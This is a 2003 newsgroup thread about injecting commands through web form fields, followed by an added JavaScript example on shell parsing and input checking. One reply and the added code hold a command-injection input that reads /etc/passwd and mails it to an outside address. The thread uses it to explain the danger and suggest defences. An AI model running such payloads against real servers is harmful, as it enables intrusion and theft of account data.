hack script and forms

 
 
steve
 
      12-03-2003
Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks


 
Brian
 
      12-03-2003

"steve" <(E-Mail Removed)> wrote in message
news:bqjil0$qqe$(E-Mail Removed)...
> Hi all
>
> what is it about that some one can paste script in the form field and
> submit the form and than what?
>
> can some one open my ice about that
> I like to know the bead and the good things about it
>
> Thanks
>
>


Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.


 
Lee
 
      12-03-2003
Brian said:
>
>
>"steve" <(E-Mail Removed)> wrote in message
>news:bqjil0$qqe$(E-Mail Removed)...
>> Hi all
>>
>> what is it about that some one can paste script in the form field and
>> submit the form and than what?
>>
>> can some one open my ice about that
>> I like to know the bead and the good things about it
>>
>> Thanks
>>
>>

>
>Hmmmm... I am guessing that this is a poor translation, because I have no
>idea what you are asking... sorry.


I think he was trying to be clever.
open my ice = "open my eyes".

 
Brian
 
      12-03-2003

"Lee" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Brian said:
> >
> >
> >"steve" <(E-Mail Removed)> wrote in message
> >news:bqjil0$qqe$(E-Mail Removed)...
> >> Hi all
> >>
> >> what is it about that some one can paste script in the form field and
> >> submit the form and than what?
> >>
> >> can some one open my ice about that
> >> I like to know the bead and the good things about it
> >>
> >> Thanks
> >>
> >>

> >
> >Hmmmm... I am guessing that this is a poor translation, because I have no
> >idea what you are asking... sorry.

>
> I think he was trying to be clever.
> open my ice = "open my eyes".
>


Yeah, I read it that way... I still don't know what he is asking, and it is
likely the case for the other readers of this group.

Brian


 
Lee
 
      12-03-2003
Brian said:
>
>
>"Lee" <(E-Mail Removed)> wrote in message
>news:(E-Mail Removed)...
>> Brian said:
>> >
>> >
>> >"steve" <(E-Mail Removed)> wrote in message
>> >news:bqjil0$qqe$(E-Mail Removed)...
>> >> Hi all
>> >>
>> >> what is it about that some one can paste script in the form field and
>> >> submit the form and than what?
>> >>
>> >> can some one open my ice about that
>> >> I like to know the bead and the good things about it
>> >>
>> >> Thanks
>> >>
>> >>
>> >
>> >Hmmmm... I am guessing that this is a poor translation, because I have no
>> >idea what you are asking... sorry.

>>
>> I think he was trying to be clever.
>> open my ice = "open my eyes".
>>

>
>Yeah, I read it that way... I still dont know what he is asking, and it is
>likely the case for the other readers of this group.


Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

 
620
 
      12-03-2003

"Brian" <(E-Mail Removed)> wrote in message
news:3fce1be9$1@10.10.0.241...
>
> "Lee" <(E-Mail Removed)> wrote in message
> news:(E-Mail Removed)...
> > Brian said:
> > >
> > >
> > >"steve" <(E-Mail Removed)> wrote in message
> > >news:bqjil0$qqe$(E-Mail Removed)...
> > >> Hi all
> > >>
> > > >> what is it about that some one can paste script in the form field and
> > > >> submit the form and than what?
> > >>
> > >> can some one open my ice about that
> > >> I like to know the bead and the good things about it
> > >>
> > >> Thanks
> > >>
> > >>
> > >
> > > >Hmmmm... I am guessing that this is a poor translation, because I have no
> > > >idea what you are asking... sorry.

> >
> > I think he was trying to be clever.
> > open my ice = "open my eyes".
> >

>
> Yeah, I read it that way... I still dont know what he is asking, and it is
> likely the case for the other readers of this group.
>
> Brian
>
>


....in other words, what's this I hear about people putting script (i.e.,
"var x = 0 / 0;") into the textbox of a form and submitting the form. What
happens thereafter, someone explain it to me, and what are the good and...
bead things about it.

And the answer is:

In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
Elemental (get that in the linux/apache ng). Once the Eye is open, you take
your Beads of the Delinquent Monk that you get in this ng and wrap them
around the Ancient Staff of Warding (I have no idea where you get an ASoW
these days, check google). Once the Beads are on the Staff, a localised
blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
out. A charred, round depression (socket) will be left. Put the Open Eye
into the charred socket. This creates the Visionary Staff of Delinquency.
Come back and see me after you've obtained the staff and I'll show you how
to smite a form with it.


 
Brian
 
      12-03-2003

"Lee" <(E-Mail Removed)> wrote in message
news:(E-Mail Removed)...
> Brian said:
> >
> >
> >"Lee" <(E-Mail Removed)> wrote in message
> >news:(E-Mail Removed)...
> >> Brian said:
> >> >
> >> >
> >> >"steve" <(E-Mail Removed)> wrote in message
> >> >news:bqjil0$qqe$(E-Mail Removed)...
> >> >> Hi all
> >> >>
> >> >> what is it about that some one can paste script in the form field and
> >> >> submit the form and than what?
> >> >>
> >> >> can some one open my ice about that
> >> >> I like to know the bead and the good things about it
> >> >>
> >> >> Thanks
> >> >>
> >> >>
> >> >
> >> >Hmmmm... I am guessing that this is a poor translation, because I have no
> >> >idea what you are asking... sorry.
> >>
> >> I think he was trying to be clever.
> >> open my ice = "open my eyes".
> >>

> >
> >Yeah, I read it that way... I still dont know what he is asking, and it is
> >likely the case for the other readers of this group.

>
> Oh. I understood the poorly-written question immediately, but my
> first impression had been that "open my ice" was a mistranslation,
> so I assumed that it was what was confusing you, too.
>
> He seems to be asking if it's true that a badly written server-side
> script can be coerced into executing code entered into form fields.
>
> Yes. He should read up on web server security.
>


Oh, in that case, the poster should stop being cute, and get to the point.
Basically, the answer is yes... it is very easy to screw with a badly
written server-side script.

For instance, let's say your script does something like:

exec("SomeShellFunction " + formValue + " someParameter");

and the user enters: something ; cat /etc/passwd | sendmail (E-Mail Removed);

That is a very simple example of making a mess, and finding all of the users
on the server.

A good way to _start_ to prevent it, is to do some server-side variable
checking, and stripping illegal characters, such as ";`'@$ etc.

B
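
The case Brian describes, worked through as an added example that is not part of the original thread: it models how a shell splits the concatenated string into separate commands, shows that stripping only the listed characters still leaves the pipe in place, and contrasts that with an allow-list plus an argument array. `SomeShellFunction` follows the post; `SAMPLE`'s address, the helper names and the allow-list pattern are assumptions made for illustration.

```javascript
// Added example, not from the thread. SomeShellFunction follows Brian's post;
// the address in SAMPLE is a constructed placeholder.
const SAMPLE = "something ; cat /etc/passwd | sendmail user@example.invalid";

// Vulnerable pattern from the post: form input concatenated into a shell string.
function buildShellString(formValue) {
  return "SomeShellFunction " + formValue + " someParameter";
}

// Simplified model of how a POSIX shell splits a line into separate commands:
// an unquoted ; | & or newline ends one command and starts the next.
function shellCommands(line) {
  const commands = [];
  let current = "";
  let quote = null;
  for (const ch of line) {
    if (quote) {
      if (ch === quote) quote = null;
      current += ch;
    } else if (ch === "'" || ch === '"') {
      quote = ch;
      current += ch;
    } else if (";|&\n".includes(ch)) {
      if (current.trim()) commands.push(current.trim());
      current = "";
    } else {
      current += ch;
    }
  }
  if (current.trim()) commands.push(current.trim());
  return commands;
}

// The stripping suggested in the post, with exactly the characters it lists.
function stripListed(formValue) {
  return formValue.replace(/[";`'@$]/g, "");
}

// Stricter check: allow-list the expected shape, then hand the value over as one
// argv element for child_process.execFile(), which by default starts no shell.
const ALLOWED = /^[A-Za-z0-9_.][A-Za-z0-9_.-]{0,63}$/;
function buildExecFileCall(formValue) {
  if (typeof formValue !== "string" || !ALLOWED.test(formValue)) {
    throw new Error("rejected form value");
  }
  return { file: "SomeShellFunction", args: [formValue, "someParameter"] };
}
```

With the sample input the concatenated string parses as three commands; after stripping the listed characters it still parses as two, which is why the post calls stripping only a start.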



 
steve
 
      12-03-2003
> >> >> Hi all
> >> >>
> >> >> what is it about that some one can paste script in the form field and
> >> >> submit the form and than what?
> >> >>
> >> >> can some one open my ice about that
> >> >> I like to know the bead and the good things about it
> >> >>
> >> >> Thanks
> >> >>
> >> >>
> >> >
> >> >Hmmmm... I am guessing that this is a poor translation, because I have no
> >> >idea what you are asking... sorry.
> >>
> >> I think he was trying to be clever.
> >> open my ice = "open my eyes".
> >>

> >
> >Yeah, I read it that way... I still dont know what he is asking, and it is
> >likely the case for the other readers of this group.

>
> Oh. I understood the poorly-written question immediately, but my
> first impression had been that "open my ice" was a mistranslation,
> so I assumed that it was what was confusing you, too.
>
> He seems to be asking if it's true that a badly written server-side
> script can be coerced into executing code entered into form fields.
>
> Yes. He should read up on web server security.


Sorry about my English
I did not try to be clever, I just want to know, as Lee guessed, how does
that work and does it affect the server or the user's computer.

For example I have a web page .html with a form in site using form to
mail function.
What script can somebody use to harm me or the server?
How can I protect myself from such scripts?
and on the other hand
How can I use such script to harm somebody's computer or a server?

Thanks and I hope that you guys understand my English


 
Lee
 
      12-03-2003
steve said:

>Sorry about my English


Sorry about guessing incorrectly.

>I did not try to be clever, I just wont to know as Lee [guess] how does
>that work and does it effect the server or the user computer.


The server.

>For example I have a web page .html with a form in site using form to
>mail function.
>What script can some body use to harm me or the server.
>How can I protect myself from such scripts


If you're using a form to mail function provided by your ISP or some
other site, then you (and they) should be safe. People don't usually
have much need to write their own, so I'm assuming that's the case.

 